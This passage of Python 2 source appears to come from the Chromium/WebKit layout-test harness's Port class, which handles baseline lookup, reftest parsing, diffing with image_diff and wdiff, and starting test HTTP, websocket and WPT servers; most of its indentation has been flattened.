native_actual_filename = self._convert_path(actual_filename)
native_diff_filename = self._convert_path(diff_filename)
executable = self._path_to_image_diff()
# Note that although we are handed 'old', 'new', image_diff wants 'new', 'old'.
        command = [executable, '--diff', native_actual_filename, native_expected_filename, native_diff_filename]
result = None
err_str = None
try:
            exit_code = self._executive.run_command(command, return_exit_code=True)
if exit_code == 0:
# The images are the same.
result = None
elif exit_code == 1:
result = self._filesystem.read_binary_file(native_diff_filename)
else:
err_str = "Image diff returned an exit code of %s. See http://crbug.com/278596" % exit_code
except OSError, e:
err_str = 'error running image diff: %s' % str(e)
finally:
self._filesystem.rmtree(str(tempdir))
return (result, err_str or None)
def diff_text(self, expected_text, actual_text, expected_filename, actual_filename):
"""Returns a string containing the diff of the two text strings
in 'unified diff' format."""
# The filenames show up in the diff output, make sure they're
# raw bytes and not unicode, so that they don't trigger join()
# trying to decode the input.
def to_raw_bytes(string_value):
if isinstance(string_value, unicode):
return string_value.encode('utf-8')
return string_value
expected_filename = to_raw_bytes(expected_filename)
actual_filename = to_raw_bytes(actual_filename)
diff = difflib.unified_diff(expected_text.splitlines(True),
actual_text.splitlines(True),
expected_filename,
actual_filename)
# The diff generated by the difflib is incorrect if one of the files
# does not have a newline at the end of the file and it is present in
# the diff. Relevant Python issue: http://bugs.python.org/issue2142
def diff_fixup(diff):
for line in diff:
yield line
if not line.endswith('\n'):
yield '\n\ No newline at end of file\n'
return ''.join(diff_fixup(diff))
def driver_name(self):
if self.get_option('driver_name'):
return self.get_option('driver_name')
return self.CONTENT_SHELL_NAME
def expected_baselines_by_extension(self, test_name):
"""Returns a dict mapping baseline suffix to relative path for each baseline in
a test. For reftests, it returns ".==" or ".!=" instead of the suffix."""
# FIXME: The name similarity between this and expected_baselines() below, is unfortunate.
# We should probably rename them both.
baseline_dict = {}
reference_files = self.reference_files(test_name)
if reference_files:
# FIXME: How should this handle more than one type of reftest?
baseline_dict['.' + reference_files[0][0]] = self.relative_test_filename(reference_files[0][1])
for extension in self.baseline_extensions():
path = self.expected_filename(test_name, extension, return_default=False)
baseline_dict[extension] = self.relative_test_filename(path) if path else path
return baseline_dict
def baseline_extensions(self):
"""Returns a tuple of all of the non-reftest baseline extensions we use. The extensions include the leading '.'."""
return ('.wav', '.txt', '.png')
def expected_baselines(self, test_name, suffix, all_baselines=False):
"""Given a test name, finds where the baseline results are located.
Args:
test_name: name of test file (usually a relative path under LayoutTests/)
suffix: file suffix of the expected results, including dot; e.g.
'.txt' or '.png'. This should not be None, but may be an empty
string.
all_baselines: If True, return an ordered list of all baseline paths
for the given platform. If False, return only the first one.
Returns
a list of ( platform_dir, results_filename ), where
platform_dir - abs path to the top of the results tree (or test
tree)
results_filename - relative path from top of tree to the results
file
(port.join() of the two gives you the full path to the file,
unless None was returned.)
Return values will be in the format appropriate for the current
platform (e.g., "\\" for path separators on Windows). If the results
file is not found, then None will be returned for the directory,
but the expected relative pathname will still be returned.
This routine is generic but lives here since it is used in
conjunction with the other baseline and filename routines that are
platform specific.
"""
baseline_filename = self._filesystem.splitext(test_name)[0] + '-expected' + suffix
baseline_search_path = self.baseline_search_path()
baselines = []
for platform_dir in baseline_search_path:
if self._filesystem.exists(self._filesystem.join(platform_dir, baseline_filename)):
baselines.append((platform_dir, baseline_filename))
if not all_baselines and baselines:
return baselines
# If it wasn't found in a platform directory, return the expected
# result in the test directory, even if no such file actually exists.
platform_dir = self.layout_tests_dir()
if self._filesystem.exists(self._filesystem.join(platform_dir, baseline_filename)):
baselines.append((platform_dir, baseline_filename))
if baselines:
return baselines
return [(None, baseline_filename)]
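    # Illustrative example (hypothetical paths): for test_name
    # 'fast/dom/foo.html' and suffix '.txt', this might return
    # [('/src/third_party/WebKit/LayoutTests/platform/win',
    #   'fast/dom/foo-expected.txt')].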
def expected_filename(self, test_name, suffix, return_default=True):
"""Given a test name, returns an absolute path to its expected results.
If no expected results are found in any of the searched directories,
the directory in which the test itself is located will be returned.
The return value is in the format appropriate for the platform
(e.g., "\\" for path separators on windows).
Args:
test_name: name of test file (usually a relative path under LayoutTests/)
suffix: file suffix of the expected results, including dot; e.g. '.txt'
or '.png'. This should not be None, but may be an empty string.
return_default: if True, returns the path to the generic expectation if nothing
else is found; if False, returns None.
This routine is generic but is implemented here to live alongside
the other baseline and filename manipulation routines.
"""
# FIXME: The [0] here is very mysterious, as is the destructured return.
platform_dir, baseline_filename = self.expected_baselines(test_name, suffix)[0]
if platform_dir:
return self._filesystem.join(platform_dir, baseline_filename)
actual_test_name = self.lookup_virtual_test_base(test_name)
if actual_test_name:
return self.expected_filename(actual_test_name, suffix)
if return_default:
return self._filesystem.join(self.layout_tests_dir(), baseline_filename)
return None
def expected_checksum(self, test_name):
"""Returns the checksum of the image we expect the test to produce, or None if it is a text-only test."""
png_path = self.expected_filename(test_name, '.png')
if self._filesystem.exists(png_path):
with self._filesystem.open_binary_file_for_reading(png_path) as filehandle:
return read_checksum_from_png.read_checksum(filehandle)
return None
def expected_image(self, test_name):
"""Returns the image we expect the test to produce."""
baseline_path = self.expected_filename(test_name, '.png')
if not self._filesystem.exists(baseline_path):
return None
return self._filesystem.read_binary_file(baseline_path)
def expected_audio(self, test_name):
baseline_path = self.expected_filename(test_name, '.wav')
if not self._filesystem.exists(baseline_path):
return None
return self._filesystem.read_binary_file(baseline_path)
def expected_text(self, test_name):
"""Returns the text output we expect the test to produce, or None
if we don't expect there to be any text output.
End-of-line characters are normalized to '\n'."""
# FIXME: DRT output is actually utf-8, but since we don't decode the
# output from DRT (instead treating it as a binary string), we read the
# baselines as a binary string, too.
baseline_path = self.expected_filename(test_name, '.txt')
if not self._filesystem.exists(baseline_path):
return None
text = self._filesystem.read_binary_file(baseline_path)
return text.replace("\r\n", "\n")
def _get_reftest_list(self, test_name):
dirname = self._filesystem.join(self.layout_tests_dir(), self._filesystem.dirname(test_name))
if dirname not in self._reftest_list:
self._reftest_list[dirname] = Port._parse_reftest_list(self._filesystem, dirname)
return self._reftest_list[dirname]
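    # A reftest.list file presumably contains lines of three whitespace-
    # separated fields, e.g. (illustrative): "== test.html test-expected.html"
    # or "!= test.html test-mismatch.html"; '#' starts a comment, and lines
    # with any other number of fields are skipped.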
@staticmethod
def _parse_reftest_list(filesystem, test_dirpath):
reftest_list_path = filesystem.join(test_dirpath, 'reftest.list')
if not filesystem.isfile(reftest_list_path):
return None
reftest_list_file = filesystem.read_text_file(reftest_list_path)
parsed_list = {}
for line in reftest_list_file.split('\n'):
line = re.sub('#.+$', '', line)
split_line = line.split()
if len(split_line) == 4:
# FIXME: Probably one of mozilla's extensions in the reftest.list format. Do we need to support this?
_log.warning("unsupported reftest.list line '%s' in %s" % (line, reftest_list_path))
continue
if len(split_line) < 3:
continue
expectation_type, test_file, ref_file = split_line
parsed_list.setdefault(filesystem.join(test_dirpath, test_file), []).append(
(expectation_type, filesystem.join(test_dirpath, ref_file)))
return parsed_list
def reference_files(self, test_name):
"""Return a list of expectation (== or !=) and filename pairs"""
reftest_list = self._get_reftest_list(test_name)
if not reftest_list:
reftest_list = []
for expectation, prefix in (('==', ''), ('!=', '-mismatch')):
for extension in Port._supported_file_extensions:
path = self.expected_filename(test_name, prefix + extension)
if self._filesystem.exists(path):
reftest_list.append((expectation, path))
return reftest_list
return reftest_list.get(self._filesystem.join(self.layout_tests_dir(), test_name), []) # pylint: disable=E1103
def tests(self, paths):
"""Return the list of tests found matching paths."""
tests = self._real_tests(paths)
suites = self.virtual_test_suites()
if paths:
tests.extend(self._virtual_tests_matching_paths(paths, suites))
else:
tests.extend(self._all_virtual_tests(suites))
return tests
def _real_tests(self, paths):
# When collecting test cases, skip these directories
skipped_directories = set(['.svn', '_svn', 'platform', 'resources', 'support', 'script-tests', 'reference', 'reftest'])
files = find_files.find(self._filesystem, self.layout_tests_dir(), paths,
skipped_directories, Port.is_test_file, self.test_key)
return [self.relative_test_filename(f) for f in files]
# When collecting test cases, we include any file with these extensions.
_supported_file_extensions = set(['.html', '.xml', '.xhtml', '.xht', '.pl',
'.htm', '.php', '.svg', '.mht', '.pdf'])
@staticmethod
# If any changes are made here be sure to update the isUsedInReftest method in old-run-webkit-tests as well.
def is_reference_html_file(filesystem, dirname, filename):
if filename.startswith('ref-') or filename.startswith('notref-'):
return True
        filename_without_ext, unused = filesystem.splitext(filename)
for suffix in ['-expected', '-expected-mismatch', '-ref', '-notref']:
            if filename_without_ext.endswith(suffix):
return True
return False
@staticmethod
def _has_supported_extension(filesystem, filename):
"""Return true if filename is one of the file extensions we want to run a test on."""
extension = filesystem.splitext(filename)[1]
return extension in Port._supported_file_extensions
@staticmethod
def is_test_file(filesystem, dirname, filename):
return Port._has_supported_extension(filesystem, filename) and not Port.is_reference_html_file(filesystem, dirname, filename)
ALL_TEST_TYPES = ['audio', 'harness', 'pixel', 'ref', 'text', 'unknown']
def test_type(self, test_name):
fs = self._filesystem
if fs.exists(self.expected_filename(test_name, '.png')):
return 'pixel'
if fs.exists(self.expected_filename(test_name, '.wav')):
return 'audio'
if self.reference_files(test_name):
return 'ref'
txt = self.expected_text(test_name)
if txt:
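            # 'layer at (0,0) size 800x600' is presumably the first line of a
            # render tree dump, implying a pixel test; PASS/FAIL/TIMEOUT lines
            # indicate testharness-style output.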
if 'layer at (0,0) size 800x600' in txt:
return 'pixel'
for line in txt.splitlines():
if line.startswith('FAIL') or line.startswith('TIMEOUT') or line.startswith('PASS'):
return 'harness'
return 'text'
return 'unknown'
def test_key(self, test_name):
"""Turns a test name into a list with two sublists, the natural key of the
dirname, and the natural key of the basename.
        This can be used when sorting paths so that files in a directory
        are kept together rather than being mixed in with files in
subdirectories."""
dirname, basename = self.split_test(test_name)
return (self._natural_sort_key(dirname + self.TEST_PATH_SEPARATOR), self._natural_sort_key(basename))
def _natural_sort_key(self, string_to_split):
""" Turns a string into a list of string and number chunks, i.e. "z23a" -> ["z", 23, "a"]
This can be used to implement "natural sort" order. See:
http://www.codinghorror.com/blog/2007/12/sorting-for-humans-natural-sort-order.html
http://nedbatchelder.com/blog/200712.html#e20071211T054956
"""
def tryint(val):
try:
return int(val)
except ValueError:
return val
return [tryint(chunk) for chunk in re.split('(\d+)', string_to_split)]
def test_dirs(self):
"""Returns the list of top-level test directories."""
layout_tests_dir = self.layout_tests_dir()
return filter(lambda x: self._filesystem.isdir(self._filesystem.join(layout_tests_dir, x)),
self._filesystem.listdir(layout_tests_dir))
@memoized
def test_isfile(self, test_name):
"""Return True if the test name refers to a directory of tests."""
# Used by test_expectations.py to apply rules to whole directories.
if self._filesystem.isfile(self.abspath_for_test(test_name)):
return True
base = self.lookup_virtual_test_base(test_name)
return base and self._filesystem.isfile(self.abspath_for_test(base))
@memoized
def test_isdir(self, test_name):
"""Return True if the test name refers to a directory of tests."""
# Used by test_expectations.py to apply rules to whole directories.
if self._filesystem.isdir(self.abspath_for_test(test_name)):
return True
base = self.lookup_virtual_test_base(test_name)
return base and self._filesystem.isdir(self.abspath_for_test(base))
@memoized
def test_exists(self, test_name):
"""Return True if the test name refers to an existing test or baseline."""
# Used by test_expectations.py to determine if an entry refers to a
# valid test and by printing.py to determine if baselines exist.
return self.test_isfile(test_name) or self.test_isdir(test_name)
def split_test(self, test_name):
"""Splits a test name into the 'directory' part and the 'basename' part."""
index = test_name.rfind(self.TEST_PATH_SEPARATOR)
if index < 1:
return ('', test_name)
return (test_name[0:index], test_name[index:])
def normalize_test_name(self, test_name):
"""Returns a normalized version of the test name or test directory."""
if test_name.endswith('/'):
return test_name
if self.test_isdir(test_name):
return test_name + '/'
return test_name
def driver_cmd_line(self):
"""Prints the DRT command line that will be used."""
driver = self.create_driver(0)
return driver.cmd_line(self.get_option('pixel_tests'), [])
def update_baseline(self, baseline_path, data):
"""Updates the baseline for a test.
Args:
baseline_path: the actual path to use for baseline, not the path to
the test. This function is used to update either generic or
platform-specific baselines, but we can't infer which here.
data: contents of the baseline.
"""
self._filesystem.write_binary_file(baseline_path, data)
# FIXME: update callers to create a finder and call it instead of these next five routines (which should be protected).
def webkit_base(self):
return self._webkit_finder.webkit_base()
def path_from_webkit_base(self, *comps):
return self._webkit_finder.path_from_webkit_base(*comps)
def path_from_chromium_base(self, *comps):
return self._webkit_finder.path_from_chromium_base(*comps)
def path_to_script(self, script_name):
return self._webkit_finder.path_to_script(script_name)
def layout_tests_dir(self):
return self._webkit_finder.layout_tests_dir()
def perf_tests_dir(self):
return self._webkit_finder.perf_tests_dir()
def skipped_layout_tests(self, test_list):
"""Returns tests skipped outside of the TestExpectations files."""
return set(self._skipped_tests_for_unsupported_features(test_list))
def _tests_from_skipped_file_contents(self, skipped_file_contents):
tests_to_skip = []
for line in skipped_file_contents.split('\n'):
line = line.strip()
line = line.rstrip('/') # Best to normalize directory names to not include the trailing slash.
if line.startswith('#') or not len(line):
continue
tests_to_skip.append(line)
return tests_to_skip
def _expectations_from_skipped_files(self, skipped_file_paths):
tests_to_skip = []
for search_path in skipped_file_paths:
filename = self._filesystem.join(self._webkit_baseline_path(search_path), "Skipped")
if not self._filesystem.exists(filename):
_log.debug("Skipped does not exist: %s" % filename)
continue
_log.debug("Using Skipped file: %s" % filename)
skipped_file_contents = self._filesystem.read_text_file(filename)
tests_to_skip.extend(self._tests_from_skipped_file_contents(skipped_file_contents))
return tests_to_skip
@memoized
def skipped_perf_tests(self):
return self._expectations_from_skipped_files([self.perf_tests_dir()])
def skips_perf_test(self, test_name):
for test_or_category in self.skipped_perf_tests():
if test_or_category == test_name:
return True
category = self._filesystem.join(self.perf_tests_dir(), test_or_category)
if self._filesystem.isdir(category) and test_name.startswith(test_or_category):
return True
return False
def is_chromium(self):
return True
def name(self):
"""Returns a name that uniquely identifies this particular type of port
(e.g., "mac-snowleopard" or "linux-trusty" and can be passed
to factory.get() to instantiate the port."""
return self._name
def operating_system(self):
# Subclasses should override this default implementation.
return 'mac'
def version(self):
"""Returns a string indicating the version of a given platform, e.g.
'leopard' or 'win7'.
This is used to help identify the exact port when parsing test
expectations, determining search paths, and logging information."""
return self._version
def architecture(self):
return self._architecture
def get_option(self, name, default_value=None):
return getattr(self._options, name, default_value)
def set_option_default(self, name, default_value):
return self._options.ensure_value(name, default_value)
@memoized
def path_to_generic_test_expectations_file(self):
return self._filesystem.join(self.layout_tests_dir(), 'TestExpectations')
def relative_test_filename(self, filename):
"""Returns a test_name a relative unix-style path for a filename under the LayoutTests
directory. Ports may legitimately return abspaths here if no relpath makes sense."""
# Ports that run on windows need to override this method to deal with
# filenames with backslashes in them.
if filename.startswith(self.layout_tests_dir()):
return self.host.filesystem.relpath(filename, self.layout_tests_dir())
else:
return self.host.filesystem.abspath(filename)
@memoized
def abspath_for_test(self, test_name):
"""Returns the full path to the file for a given test name. This is the
inverse of relative_test_filename()."""
return self._filesystem.join(self.layout_tests_dir(), test_name)
def results_directory(self):
"""Absolute path to the place to store the test results (uses --results-directory)."""
if not self._results_directory:
option_val = self.get_option('results_directory') or self.default_results_directory()
self._results_directory = self._filesystem.abspath(option_val)
return self._results_directory
def bot_test_times_path(self):
return self._build_path('webkit_test_times', 'bot_times_ms.json')
def perf_results_directory(self):
return self._build_path()
def inspector_build_directory(self):
return self._build_path('resources', 'inspector')
def default_results_directory(self):
"""Absolute path to the default place to store the test results."""
try:
return self.path_from_chromium_base('out', self.get_option('configuration'), 'layout-test-results')
except AssertionError:
return self._build_path('layout-test-results')
def setup_test_run(self):
"""Perform port-specific work at the beginning of a test run."""
# Delete the disk cache if any to ensure a clean test run.
dump_render_tree_binary_path = self._path_to_driver()
cachedir = self._filesystem.dirname(dump_render_tree_binary_path)
cachedir = self._filesystem.join(cachedir, "cache")
if self._filesystem.exists(cachedir):
self._filesystem.rmtree(cachedir)
if self._dump_reader:
self._filesystem.maybe_make_directory(self._dump_reader.crash_dumps_directory())
def num_workers(self, requested_num_workers):
"""Returns the number of available workers (possibly less than the number requested)."""
return requested_num_workers
def clean_up_test_run(self):
"""Perform port-specific work at the end of a test run."""
if self._image_differ:
self._image_differ.stop()
self._image_differ = None
# FIXME: os.environ access should be moved to onto a common/system class to be more easily mockable.
def _value_or_default_from_environ(self, name, default=None):
if name in os.environ:
return os.environ[name]
return default
def _copy_value_from_environ_if_set(self, clean_env, name):
if name in os.environ:
clean_env[name] = os.environ[name]
def setup_environ_for_server(self, server_name=None):
# We intentionally copy only a subset of os.environ when
# launching subprocesses to ensure consistent test results.
clean_env = {
'LOCAL_RESOURCE_ROOT': self.layout_tests_dir(), # FIXME: Is this used?
}
variables_to_copy = [
'WEBKIT_TESTFONTS', # FIXME: Is this still used?
'WEBKITOUTPUTDIR', # FIXME: Is this still used?
'CHROME_DEVEL_SANDBOX',
'CHROME_IPC_LOGGING',
'ASAN_OPTIONS',
'TSAN_OPTIONS',
'MSAN_OPTIONS',
'LSAN_OPTIONS',
'UBSAN_OPTIONS',
'VALGRIND_LIB',
'VALGRIND_LIB_INNER',
]
if self.host.platform.is_linux() or self.host.platform.is_freebsd():
variables_to_copy += [
'XAUTHORITY',
'HOME',
'LANG',
'LD_LIBRARY_PATH',
'DBUS_SESSION_BUS_ADDRESS',
'XDG_DATA_DIRS',
]
clean_env['DISPLAY'] = self._value_or_default_from_environ('DISPLAY', ':1')
if self.host.platform.is_mac():
clean_env['DYLD_LIBRARY_PATH'] = self._build_path()
variables_to_copy += [
'HOME',
]
if self.host.platform.is_win():
variables_to_copy += [
'PATH',
'GYP_DEFINES', # Required to locate win sdk.
]
if self.host.platform.is_cygwin():
variables_to_copy += [
'HOMEDRIVE',
'HOMEPATH',
'_NT_SYMBOL_PATH',
]
for variable in variables_to_copy:
self._copy_value_from_environ_if_set(clean_env, variable)
for string_variable in self.get_option('additional_env_var', []):
name, value = string_variable.split('=', 1)
clean_env[name] = value
return clean_env
def show_results_html_file(self, results_filename):
"""This routine should display the HTML file pointed at by
results_filename in the user's browser."""
return self.host.user.open_url(path.abspath_to_uri(self.host.platform, results_filename))
def create_driver(self, worker_number, no_timeout=False):
"""Return a newly created Driver subclass for starting/stopping the test driver."""
return self._driver_class()(self, worker_number, pixel_tests=self.get_option('pixel_tests'), no_timeout=no_timeout)
def start_helper(self):
"""If a port needs to reconfigure graphics settings or do other
things to ensure a known test configuration, it should override this
method."""
helper_path = self._path_to_helper()
if helper_path:
_log.debug("Starting layout helper %s" % helper_path)
# Note: Not thread safe: http://bugs.python.org/issue2320
self._helper = self._executive.popen([helper_path],
stdin=self._executive.PIPE, stdout=self._executive.PIPE, stderr=None)
is_ready = self._helper.stdout.readline()
if not is_ready.startswith('ready'):
_log.error("layout_test_helper failed to be ready")
def requires_http_server(self):
"""Does the port require an HTTP server for running tests? This could
be the case when the tests aren't run on the host platform."""
return False
def start_http_server(self, additional_dirs, number_of_drivers):
"""Start a web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a web server to be running."""
assert not self._http_server, 'Already running an http server.'
server = apache_http.ApacheHTTP(self, self.results_directory(),
additional_dirs=additional_dirs,
number_of_servers=(number_of_drivers * 4))
server.start()
self._http_server = server
def start_websocket_server(self):
"""Start a web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a websocket server to be running."""
assert not self._websocket_server, 'Already running a websocket server.'
server = pywebsocket.PyWebSocket(self, self.results_directory())
server.start()
self._websocket_server = server
def is_wpt_enabled(self):
"""Used as feature flag for WPT Serve feature."""
return self._is_wpt_enabled
def is_wpt_test(self, test):
"""Whether this test is part of a web-platform-tests which require wptserve servers."""
return "web-platform-tests" in test
def start_wptserve(self):
"""Start a WPT web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a WPT web server to be running."""
assert not self._wpt_server, 'Already running a WPT server.'
assert self.is_wpt_enabled(), 'Cannot start server if WPT is not enabled.'
# We currently don't support any output mechanism for the WPT server.
server = wptserve.WPTServe(self, self.results_directory())
server.start()
self._wpt_server = server
def stop_wptserve(self):
"""Shut down the WPT server if it is running. Do nothing if it isn't."""
if self._wpt_server:
self._wpt_server.stop()
self._wpt_server = None
def http_server_supports_ipv6(self):
# Apache < 2.4 on win32 does not support IPv6, nor does cygwin apache.
if self.host.platform.is_cygwin() or self.host.platform.is_win():
return False
return True
def stop_helper(self):
"""Shut down the test helper if it is running. Do nothing if
it isn't, or it isn't available. If a port overrides start_helper()
it must override this routine as well."""
if self._helper:
_log.debug("Stopping layout test helper")
try:
self._helper.stdin.write("x\n")
self._helper.stdin.close()
self._helper.wait()
except IOError:
pass
finally:
self._helper = None
def stop_http_server(self):
"""Shut down the http server if it is running. Do nothing if it isn't."""
if self._http_server:
self._http_server.stop()
self._http_server = None
def stop_websocket_server(self):
"""Shut down the websocket server if it is running. Do nothing if it isn't."""
if self._websocket_server:
self._websocket_server.stop()
self._websocket_server = None
#
# TEST EXPECTATION-RELATED METHODS
#
def test_configuration(self):
"""Returns the current TestConfiguration for the port."""
if not self._test_configuration:
self._test_configuration = TestConfiguration(self._version, self._architecture, self._options.configuration.lower())
return self._test_configuration
# FIXME: Belongs on a Platform object.
@memoized
def all_test_configurations(self):
"""Returns a list of TestConfiguration instances, representing all available
test configurations for this port."""
return self._generate_all_test_configurations()
# FIXME: Belongs on a Platform object.
def configuration_specifier_macros(self):
"""Ports may provide a way to abbreviate configuration specifiers to conveniently
refer to them as one term or alias specific values to more generic ones. For example:
(vista, win7) -> win # Abbreviate all Windows versions into one namesake.
(precise, trusty) -> linux # Change specific name of Linux distro to a more generic term.
Returns a dictionary, each key representing a macro term ('win', for example),
and value being a list of valid configuration specifiers (such as ['vista', 'win7'])."""
return self.CONFIGURATION_SPECIFIER_MACROS
def _generate_all_test_configurations(self):
"""Returns a sequence of the TestConfigurations the port supports."""
# By default, we assume we want to test every graphics type in
# every configuration on every system.
test_configurations = []
for version, architecture in self.ALL_SYSTEMS:
for build_type in self.ALL_BUILD_TYPES:
test_configurations.append(TestConfiguration(version, architecture, build_type))
return test_configurations
def warn_if_bug_missing_in_test_expectations(self):
return True
def _port_specific_expectations_files(self):
paths = []
paths.append(self._filesystem.join(self.layout_tests_dir(), 'NeverFixTests'))
paths.append(self._filesystem.join(self.layout_tests_dir(), 'StaleTestExpectations'))
paths.append(self._filesystem.join(self.layout_tests_dir(), 'SlowTests'))
if self._is_wpt_enabled:
paths.append(self._filesystem.join(self.layout_tests_dir(), 'WPTServeExpectations'))
return paths
def _flag_specific_expectations_files(self):
return [self._filesystem.join(self.layout_tests_dir(), 'FlagExpectations', flag.lstrip('-'))
for flag in self.get_option('additional_driver_flag', [])]
def expectations_dict(self):
"""Returns an OrderedDict of name -> expectations strings.
The names are expected to be (but not required to be) paths in the filesystem.
If the name is a path, the file can be considered updatable for things like rebaselining,
so don't use a path-like name unless it actually is a path.
Generally speaking the ordering should be files in the filesystem in cascade order
(TestExpectations followed by Skipped, if the port honors both formats),
then any built-in expectations (e.g., from compile-time exclusions), then --additional-expectations options."""
# FIXME: rename this to test_expectations() once all the callers are updated to know about the ordered dict.
expectations = OrderedDict()
for path in self.expectations_files():
if self._filesystem.exists(path):
expectations[path] = self._filesystem.read_text_file(path)
for path in self.get_option('additional_expectations', []):
expanded_path = self._filesystem.expanduser(path)
if self._filesystem.exists(expanded_path):
_log.debug("reading additional_expectations from path '%s'" % path)
expectations[path] = self._filesystem.read_text_file(expanded_path)
else:
_log.warning("additional_expectations path '%s' does not exist" % path)
return expectations
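# Illustrative shape of the mapping returned above (not from the original
# source; actual paths depend on the checkout):
#     OrderedDict([('/src/LayoutTests/TestExpectations', '<contents>'),
#                  ('/src/LayoutTests/NeverFixTests', '<contents>'), ...])
# Later entries take precedence over earlier ones in cascade order.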
def bot_expectations(self):
if not self.get_option('ignore_flaky_tests'):
return {}
full_port_name = self.determine_full_port_name(self.host, self._options, self.port_name)
builder_category = self.get_option('ignore_builder_category', 'layout')
factory = BotTestExpectationsFactory()
# FIXME: This only grabs the release builder's flakiness data. If we're
# running debug, we should grab the debug builder's data instead.
expectations = factory.expectations_for_port(full_port_name, builder_category)
if not expectations:
return {}
ignore_mode = self.get_option('ignore_flaky_tests')
if ignore_mode in ('very-flaky', 'maybe-flaky'):
return expectations.flakes_by_path(ignore_mode == 'very-flaky')
if ignore_mode == 'unexpected':
return expectations.unexpected_results_by_path()
_log.warning("Unexpected ignore mode: '%s'." % ignore_mode)
return {}
def expectations_files(self):
return ([self.path_to_generic_test_expectations_file()] +
self._port_specific_expectations_files() +
self._flag_specific_expectations_files())
def repository_path(self):
"""Returns the repository path for the chromium code base."""
return self.path_from_chromium_base('build')
_WDIFF_DEL = '##WDIFF_DEL##'
_WDIFF_ADD = '##WDIFF_ADD##'
_WDIFF_END = '##WDIFF_END##'
def _format_wdiff_output_as_html(self, wdiff):
wdiff = cgi.escape(wdiff)
wdiff = wdiff.replace(self._WDIFF_DEL, "<span class=del>")
wdiff = wdiff.replace(self._WDIFF_ADD, "<span class=add>")
wdiff = wdiff.replace(self._WDIFF_END, "</span>")
html = "<head><style>.del { background: #faa; } "
html += ".add { background: #afa; }</style></head>"
html += "<pre>%s</pre>" % wdiff
return html
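# Illustrative example (not in the original): for wdiff output such as
#     'foo ##WDIFF_DEL##old##WDIFF_END## ##WDIFF_ADD##new##WDIFF_END##'
# the method above produces the del/add styles in a <head> block followed by
#     <pre>foo <span class=del>old</span> <span class=add>new</span></pre>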
def _wdiff_command(self, actual_filename, expected_filename):
executable = self._path_to_wdiff()
return [executable,
"--start-delete=%s" % self._WDIFF_DEL,
"--end-delete=%s" % self._WDIFF_END,
"--start-insert=%s" % self._WDIFF_ADD,
"--end-insert=%s" % self._WDIFF_END,
actual_filename,
expected_filename]
@staticmethod
def _handle_wdiff_error(script_error):
# Exit 1 means the files differed, any other exit code is an error.
if script_error.exit_code != 1:
raise script_error
def _run_wdiff(self, actual_filename, expected_filename):
"""Runs wdiff and may throw exceptions.
This is mostly a hook for unit testing."""
# Diffs are treated as binary as they may include multiple files
# with conflicting encodings. Thus we do not decode the output.
command = self._wdiff_command(actual_filename, expected_filename)
wdiff = self._executive.run_command(command, decode_output=False,
error_handler=self._handle_wdiff_error)
return self._format_wdiff_output_as_html(wdiff)
_wdiff_error_html = "Failed to run wdiff, see error log."
def wdiff_text(self, actual_filename, expected_filename):
"""Returns a string of HTML indicating the word-level diff of the
contents of the two filenames. Returns an empty string if word-level
diffing isn't available."""
if not self.wdiff_available():
return ""
try:
# It's possible to raise a ScriptError if we pass wdiff invalid paths.
return self._run_wdiff(actual_filename, expected_filename)
except OSError as e:
if e.errno in [errno.ENOENT, errno.EACCES, errno.ECHILD]:
# Silently ignore cases where wdiff is missing.
self._wdiff_available = False
return ""
raise
except ScriptError as e:
_log.error("Failed to run wdiff: %s" % e)
self._wdiff_available = False
return self._wdiff_error_html
# This is a class variable so we can test error output easily.
_pretty_patch_error_html = "Failed to run PrettyPatch, see error log."
def pretty_patch_text(self, diff_path):
if self._pretty_patch_available is None:
self._pretty_patch_available = self.check_pretty_patch(logging=False)
if not self._pretty_patch_available:
return self._pretty_patch_error_html
command = ("ruby", "-I", self._filesystem.dirname(self._pretty_patch_path),
self._pretty_patch_path, diff_path)
try:
# Diffs are treated as binary (we pass decode_output=False) as they
# may contain multiple files of conflicting encodings.
return self._executive.run_command(command, decode_output=False)
except OSError as e:
# If the system is missing ruby log the error and stop trying.
self._pretty_patch_available = False
_log.error("Failed to run PrettyPatch (%s): %s" % (command, e))
return self._pretty_patch_error_html
except ScriptError as e:
# If ruby failed to run for some reason, log the command
# output and stop trying.
self._pretty_patch_available = False
_log.error("Failed to run PrettyPatch (%s):\n%s" % (command, e.message_with_output()))
return self._pretty_patch_error_html
def default_configuration(self):
return self._config.default_configuration()
def clobber_old_port_specific_results(self):
pass
# FIXME: This does not belong on the port object.
@memoized
def path_to_apache(self):
"""Returns the full path to the apache binary.
This is needed only by ports that use the apache_http_server module."""
raise NotImplementedError('Port.path_to_apache')
def path_to_apache_config_file(self):
"""Returns the full path to the apache configuration file.
If the WEBKIT_HTTP_SERVER_CONF_PATH environment variable is set, its
contents will be used instead.
This is needed only by ports that use the apache_http_server module."""
config_file_from_env = os.environ.get('WEBKIT_HTTP_SERVER_CONF_PATH')
if config_file_from_env:
if not self._filesystem.exists(config_file_from_env):
raise IOError('%s was not found on the system' % config_file_from_env)
return config_file_from_env
config_file_name = self._apache_config_file_name_for_platform()
return self._filesystem.join(self.layout_tests_dir(), 'http', 'conf', config_file_name)
#
# PROTECTED ROUTINES
#
# The routines below should only be called by routines in this class
# or any of its subclasses.
#
def _apache_version(self):
config = self._executive.run_command([self.path_to_apache(), '-v'])
return re.sub(r'(?:.|\n)*Server version: Apache/(\d+\.\d+)(?:.|\n)*', r'\1', config)
def _apache_config_file_name_for_platform(self):
if self.host.platform.is_cygwin():
return 'cygwin-httpd.conf' # CYGWIN is the only platform to still use Apache 1.3.
if self.host.platform.is_linux():
distribution = self.host.platform.linux_distribution()
custom_configuration_distributions = ['arch', 'debian', 'redhat']
if distribution in custom_configuration_distributions:
return "%s-httpd-%s.conf" % (distribution, self._apache_version())
return 'apache2-httpd-' + self._apache_version() + '.conf'
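# Illustrative results of the lookup above (not from the original source):
# cygwin -> 'cygwin-httpd.conf'; Debian with Apache 2.4 ->
# 'debian-httpd-2.4.conf'; any other platform with Apache 2.4 ->
# 'apache2-httpd-2.4.conf'.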
def _path_to_driver(self, target=None):
"""Returns the full path to the test driver."""
return self._build_path(target, self.driver_name())
def _path_to_webcore_library(self):
"""Returns the full path to a built copy of WebCore."""
return None
def _path_to_helper(self):
"""Returns the full path to the layout_test_helper binary, which
is used to help configure the system for the test run, or None
if no helper is needed.
This is likely only used by start/stop_helper()."""
return None
def _path_to_image_diff(self):
"""Returns the full path to the image_diff binary, or None if it is not available.
This is likely used only by diff_image()"""
return self._build_path('image_diff')
@memoized
